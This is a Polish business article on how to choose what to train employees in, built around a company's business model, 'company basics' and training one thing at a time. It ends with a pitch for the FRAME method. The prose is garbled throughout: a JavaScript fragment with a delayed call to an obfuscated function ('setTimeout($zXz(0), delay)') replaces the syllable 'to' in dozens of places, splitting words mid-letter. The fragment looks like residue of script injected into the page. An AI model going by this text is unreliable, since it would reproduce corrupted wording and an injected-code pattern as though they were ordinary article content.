In Artykuły, Handel, Uniwersalne

Jak szkolić pracownika? A przede wszystkim w czym? Na dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to pytanie nie ma prostej odpowiedzi. A raczej jest, w tym, co jest ważne dla Modelu Biznesowego, a w firmie sprzedażowej szczególnie dla jej Konceptu Sprzedażowego.

Co dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jest Model Biznesowy i Koncept Sprzedażowy?

Model Biznesowy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to obudowa dla przewagi konkurencyjnej. Ale też maszyna do przekształcania zasobów firmy w jej ren dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towność. W firmie która cokolwiek sprzedaje, szczególnie ważna jest ta specyficzna część Modelu, która przekształca rynek w sprzedaż. Czyli jej Koncept Sprzedażowy.

Uwaga. „każdy model dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to uproszczenie”. W szczególności takim uproszczeniem jest Model Biznesowy. On sprowadza skomplikowaną rzeczywis dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tość firmy do prostego, ale i zrozumiałego modelu. Taki model pozwala zrozumieć podstawowe zasady działania, pozwala też dostrzec, co jest ważne. Ale też trzeba umieć później zas dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosować tę wiedzę w realnej i już skomplikowanej rzeczywis dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tości.

Koncept Sprzedażowy ta część Modelu, którą klient widzi i odczuwa. Tak naprawdę dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to on wręcz u dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tożsamia firmę z jej Konceptem, częs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to bowiem nie ma świadomości istnienia Modelu. To Koncept Sprzedażowy składa klien dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towi jakąś obietnicę, która dopiero ściąga klienta do firmy. Następnie tę obietnicę spełnia lub nie, czym zajmuje się zarządzanie codziennością. Ale dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to już domena Modelu.

We wszystkim jednak szkolić się nie da. Lepiej coś wybrać. A najlepiej wybrać z funkcjonowania Modelu dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, co jest w nim najważniejsze. Może nie na poziomie przewagi konkurencyjnej, ale najwyżej o jeden poziom niżej. Czyli company basics.

Company basics

Czyli zasada, że wszystko jest ważne. Ale niektóre rzeczy są dużo ważniejsze.

Taki podział elementów Modelu pozwala wybrać, co najważniejsze. A spośród najważniejszego, co jest wręcz kluczowe. Co może nie jest na poziomie przewagi konkurencyjnej, ale już tylko o najwyżej jeden szczebel niżej.

Jakie mogą być company basics?

Różne, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zależy od konkretnej firmy oraz jej Modelu. A ten każda ma inny. Każdy też ma przecież różną przewagę konkurencyjną, zaś od niej bezpośrednio zależy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, co jest company basics. To zawsze war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to sobie uzmysłowić, spisać na kartce, znów przemyśleć, przedysku dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować, sprawdzić, jak tak spisane company basics wpływają na działanie Modelu i na konkurencyjność firmy.

Przykładowo dla firmy sprzedażowej, działającej w modelu intensywnej obsługi klienta, company basics mogą być następujące:

Z zasadą – „najlepiej zacząć od company basics” związana jest druga zasada – „tylko jedno na raz”. Ta zasada oznacza, że w trakcie szkolenia szkolący (i szkolony) skupiają się na tym, co najważniejsze. I tylko na tym. A co jeszcze ważniejsze, tylko na jednej rzeczy na raz.

Tylko jedno na raz

Gdyż na większej liczbie i tak nie da się skupić. Nie da się też dopilnować.

Uwaga. „najpierw trzeba się zmierzyć z przekonaniem – „ja już dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to robię”. To zawsze podstawa skutecznego szkolenia. Trudno bowiem czegokolwiek nauczyć kogoś, k dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zakłada, że już umie.

Gdy firma już wie, co w zachowaniach pracowników jest dla niej najważniejsze, czas na szkolenie. Tyle, że zacząć trzeba od tego, kogo w czym szkolić.

Kogo w czym szkolić? Teraz czas, aby wyznaczyć który z pracowników nie wykonuje (lub wykonuje niedostatecznie dobrze) jakiś składnik company basics.

Teraz trzeba tylko przekonać pracownika, że tak właśnie jest. Gdyż na ogół ci są przekonani, że nie jest. Po tym wyborze i przekonaniu czas na wybór, na czym z danym pracownikiem trzeba się skoncentrować. I dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, oraz tylko dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to trzeba teraz przećwiczyć.

Takie podejście dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to efekt założenia, że sama wiedza nie wystarczy. Gdyż wiedzieć i umieć dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to samo. A nawet od umieć daleko jeszcze do zas dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosowania w praktyce.

Szkolenie w tylko jednym na raz pozwala na opanowanie całego procesu, od „wiedzieć”, przez „umieć” do „s dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosować w praktyce”. A tylko cały taki proces umożliwi firmie skorzystanie z efektów szkolenia.

Podsumowanie

Szkolenie zawsze war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zacząć od określenia, kogo i w czym war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to szkolić. A także od określenia priorytetów, gdyż wszystkiego każdego nie da się nauczyć, przynajmniej nie od razu. A w szkoleniu najlepiej przyjąć zasadę, żeby na raz szkolić tylko w jednym. Tak długo, aż się dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to opanuje. I dopiero wtedy przejść do kolejnego etapu. Jeśli wybierze się dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, co naprawdę ważne, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to całkowicie wystarczy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, aby firma znacznie poprawiła funkcjonowanie.

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.